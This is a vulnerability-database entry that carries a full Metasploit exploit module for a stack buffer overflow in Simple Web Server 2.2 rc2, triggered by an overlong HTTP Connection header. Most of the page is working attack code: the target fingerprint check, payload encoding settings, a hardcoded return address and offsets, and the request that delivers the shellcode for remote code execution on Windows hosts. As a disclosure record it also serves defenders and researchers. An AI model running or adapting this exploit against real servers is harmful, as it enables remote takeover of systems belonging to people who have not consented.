Simple Web Server Connection Header Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Simple Web Server Connection Header Buffer Overflow. Exploits a vulnerability in Simple Web Server 2.2 rc2 by sending a long string in the Connection Header to cause a stack overflow and gain arbitrary code execution. Successfully tested on Windows 7 SP1 and Windows XP SP3


                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = NormalRanking

	HttpFingerprint = { :pattern =&#62; [ /PMSoftware-SWS/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			&#39;Name&#39;        =&#62; &#34;Simple Web Server Connection Header Buffer Overflow&#34;,
			&#39;Description&#39; =&#62; %q{
				This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
				can send a long string data in the Connection Header to causes an overflow on the
				stack when function vsprintf() is used, and gain arbitrary code execution. The
				module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
			},
			&#39;License&#39;	  =&#62; MSF_LICENSE,
			&#39;Author&#39;      =&#62;
				[
					&#39;mr.pr0n&#39;, # Vulnerability Discovery and PoC
					&#39;juan&#39; # Metasploit module
				],
			&#39;References&#39; =&#62;
				[
					[&#39;EDB&#39;, &#39;19937&#39;],
					[&#39;URL&#39;, &#39;http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/&#39;]
				],
			&#39;Payload&#39;	 =&#62;
				{
					&#39;BadChars&#39; =&#62; &#34;\x00\x0a\x0d&#34;,
					&#39;Space&#39; =&#62; 2048,
					&#39;DisableNops&#39; =&#62; true,
					&#39;PrependEncoder&#39; =&#62; &#34;\x81\xC4\x60\xF0\xFF\xFF&#34;, # add esp, -4000
				},
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#34;process&#34;,
				},
			&#39;Platform&#39; =&#62; &#39;win&#39;,
			&#39;Targets&#39;  =&#62;
				[
					[
						&#39;SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1&#39;,
						{
							&#39;Ret&#39; =&#62; 0x6fcbc64b, # call edi from libstdc++-6.dll
							&#39;Offset&#39; =&#62; 2048,
							&#39;OffsetEDI&#39; =&#62; 84
						}
					]
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;DisclosureDate&#39; =&#62; &#34;Jul 20 2012&#34;,
			&#39;DefaultTarget&#39;  =&#62; 0))
	end

	def check
		res = send_request_raw({&#39;uri&#39;=&#62;&#39;/&#39;})
		if res and res.headers[&#39;Server&#39;] =~ /PMSoftware\-SWS\/2\.[0-2]/
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit

		sploit = payload.encoded
		sploit &#60;&#60; rand_text(target[&#39;Offset&#39;] - sploit.length)
		sploit &#60;&#60; [target.ret].pack(&#34;V&#34;) # eip
		sploit &#60;&#60; rand_text(target[&#39;OffsetEDI&#39;])
		sploit &#60;&#60; Metasm::Shellcode.assemble(Metasm::Ia32.new, &#34;jmp $-#{sploit.length}&#34;).encode_string

		print_status(&#34;Trying target #{target.name}...&#34;)

		connect

		send_request_cgi({
			&#39;uri&#39;        =&#62; &#39;/&#39;,
			&#39;version&#39;    =&#62; &#39;1.1&#39;,
			&#39;method&#39;     =&#62; &#39;GET&#39;,
			&#39;connection&#39; =&#62; sploit
		})

		disconnect

	end
end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1